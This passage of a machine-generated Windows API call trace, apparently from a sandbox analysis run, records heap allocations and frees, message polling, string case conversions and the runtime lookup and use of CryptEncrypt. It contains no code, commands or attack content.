Size=0x1) returned 0x24b17c8 [0257.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1698 [0257.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0257.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0257.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.301] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0257.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0257.302] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0257.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa910 [0257.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.302] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.302] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0257.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.303] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0257.303] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0257.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.306] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0257.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0257.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa6b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0257.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.309] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0257.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0257.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0257.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.309] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b16b8*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b16b8*, pdwDataLen=0x8bef68*=0x8) returned 1 [0257.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0257.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0257.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0257.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0257.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0257.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0257.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0257.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0257.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0257.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0257.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0257.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0257.312] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.312] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0257.312] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.312] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.312] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.313] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0257.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0257.313] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0257.313] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0257.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.313] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0257.313] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, 